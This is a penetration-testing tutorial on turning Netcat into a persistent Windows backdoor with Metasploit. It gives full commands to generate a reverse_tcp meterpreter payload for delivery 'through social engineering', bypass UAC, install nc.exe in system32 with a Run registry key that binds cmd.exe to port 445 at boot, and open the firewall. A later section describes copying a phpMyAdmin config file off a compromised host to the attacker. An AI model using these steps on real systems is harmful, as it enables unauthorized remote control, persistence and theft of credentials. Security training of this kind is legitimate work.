Netcat is a software service that can perform various network management operations, such as traffic monitoring, port scanning, file sharing, communication, and information gathering. In Cybersecurity, one can benefit from these features by transforming the Netcat abilities into penetration testing utilities. For this purpose, the Netcat requires the services of Metasploit framework to generate payload and compromise the target machine with persistent backdoor techniques. The Metasploit works in two phases. First, it generates a payload specific to the target environment. This payload is shared with the target machine using any social engineering technique. In the next step, Metasploit waits for a connection from the victim’s side. When the user interacts with the payload, a session is established between the attacker and the victim machine. The process is explained below in detail.
Metasploit is a handy Cybersecurity framework that has a number of payloads and exploits to help people with various penetration testing challenges. The payloads in Metasploit are classified into (i) Single and (ii) Stager modules. A single is a self-contained payload that operates independently. The stager payloads are host-dependent as they establish a connection between the target and host machines with the help of payload components called stages. Meterpreter and shell are well-known examples of Metasploit stages. The stagers can create single or recurrent backdoors for the users. A single backdoor is a temporary connection that remains active only when the participating machines are alive. If one of the machines goes offline, the connection is lost. On the other hand, the recurrent backdoors are capable of re-establishing the connections at later stages. These backdoors are known as persistent backdoors. In this tutorial, we will learn how to create a persistent backdoor with the help of Metasploit and Netcat utility.
Netcat Backdoor
- Generate Payload
First, we need to generate a Metasploit payload. This can be achieved through MSFVenom utility. Since our target is a Windows machine, we can search for Windows payload from the available list of payloads using the following command.
msvenom -l payloads
In this demonstration, we have selected the reverse_tcp stager to establish a TCP connection between the host and the target machine.
We can use the following syntax to generate the desired payload.
msfvenom –p <payload> lhost=<localhost IP> lport=<local port> -f <payload format> > <payload file name>
The localhost IP can be obtained using the ifconfig command. The local port can be any port for listening purposes. In our case, it is 4444. We are interested in a payload with .exe format. Let’s call it the demo.exe payload file.
msfvenom –p windows/meterpreter/reverse_tcp lhost=10.0.2.15 lport=4444 -f exe > demo.exe
We can access the (demo.exe) payload by moving it to the Desktop location.
sudo mv demo.exe ~/Desktop/
Allow the payload file to run as a program by changing permission as shown in the following screenshot.
Now, this payload is ready to be shared with the victim through social engineering techniques.
- Listen for Connection
After generating and sharing the payload with the victim, we require a stub that can handle exploits outside the Metasploit framework. For this purpose, we can use the multi/handler exploit utility.
use exploit/multi/handler
The multi/handler needs to know which payload is going to be used by us to compromise the target system. The information can be communicated using the following command.
set payload windows/meterpreter/reverse_tcp
The show options command displays the mandatory parameters of the exploit. In this case, the parameters are the internal IP and the listening port number. We can configure the values using the set command. Both parameters should match the values configured in the payload file.
when the victim interacts with the (demo.exe) bait, a session is established between the host and the target machine.
- Configuring Netcat for Persistent Backdoor
Now we have a meterpreter session between the target and host machine. The next step is to create the persistent Netcat backdoor. For this purpose, we need to install the Netcat backdoor on the victim machine. The current session may not allow us to make the required changes on the target system due to limited privileges. For instance, we need to upload the Netcat copy from our Kali Linux machine on the target operating system using the following command.
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
However, the above action gives the following error due to non-admin privileges.
This problem can be solved with the help of the Windows User Account Control (UAC) exploit available in Metasploit. Run the active meterpreter session in the background and search for the windows UAC exploit.
background search bypassuac
The windows/local/bypassuac works best in the current scenario. Run the exploit using the following commands to bypass the user access control (UAC) protocols.
use exploit/windows/local/bypassuac set session 1 run
Escalate the account privileges using the getprivis command.
getprivis
Repeat the Netcat upload process command.
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
We can use the Windows registry keys to execute the Netcat on the start-up of the remote host and listen to the desired port. The following Windows registry key can be used for this purpose.
HKLM\software\microsoft\windows\currentversion\
We can optionally run this key to enumerate the values.
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Set the (Netcat) values for the current key using the following command.
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
The above command executes the Netcat on Windows startup to listen and communicate at port 445 on the remote host. We can confirm the addition of the Netcat process in the registry key values by running the value query command.
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
The following screenshot confirms the Netcat (nc) addition to the list.
The Netcat persistent backdoor process is almost complete here. However, the remote Firewall can interrupt the Netact connection. To manage this issue, we can modify the Firewall settings to allow the Netcat connection through the Firewall. Run the meterpreter in command prompt (CMD) mode.
execute -f cmd -i
Check the Firewall configurations (modes) for all the available profiles using the following command.
netsh firewall show opmode
Add the TCP port exception to allow the Netcat to listen and communicate back with the host user when prompted.
netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
The innocent Netcat has now become a monster penetration testing utility that can connect with the target machine through a persistent backdoor channel.
Netcat Command Menu
Example Command
Port Scanning
Nmap isn’t the only utility to use for port scanning or ping sweeping. In fact, netcat can help us as well.
Thanks to the -z flag, when combined with the -v flag,we can tell netcat to scan for listening daemons (open ports); without sending any data to them.
The inverse host lookup failed error can be corrected by simply adding the -n flag, so it doesn’t attempt to do a DNS lookup.
However, it does require you to specify a list of the ports to be scanned, as a parameter.
We can also specify a range of ports to be scanned, like so.
Now, let’s move on to handling TCP and UDP connections.
Opening TCP Connections
netcat can also be used to open a TCP connection to a determined host, specifying the destination port.
Let’s say you want to get the HTML code for a web page; to do so, you can establish a TCP connection on port 80.
Now you can send some HTTP commands. For example, let’s send a raw GET request.
Using this, you can do interesting things, like sending a custom User-Agent, etc. ;-)
Sending Files
netcat also allows you to send files from one host to the other. Let’s to back to the previous example of the host that has has already been infiltrated and on which we already have a shell.
On the target host, we change into and list the contents of the /var/www/ directory, and find the following web applications:
You can see that, among other things, there is a phpmyadmin instance. Let’s look inside this directory and try to locate the configuration file.
Having found the config.sample.inc.php file – this is the configuration file for phpMyAdmin –, we can set up a listener on the attacker.
At the end, we use the ‘>’ character to take whatever we receive in netcat, and pass it through to the file which will be named phpMyAdmin_config.
Next, let’s go back to the target and send the file to our listener on the attacker side; like so:
This time we use the ‘<’ character to do a similar thing; we take the contents of the config.sample.inc.php file, and pass it all through to the netcat connection to the attacker.
Thus, even if it might seem like nothing is happening; in reality, the file is copied over the network.
You can then close netcat by pressing Ctrl + C.
You can run ls to verify that the phpMyAdmin_config file was created, and then run the cat command to verify that the contents of the file were successfully copied; as shown in the screenshot below.
Conclusion
Netcat is a wonderful networking utility that can become a handy penetration testing tool with the help of the Metasploit framework. However, the Netcat installation as a persistent backdoor depends on the access privileges of the compromised user account.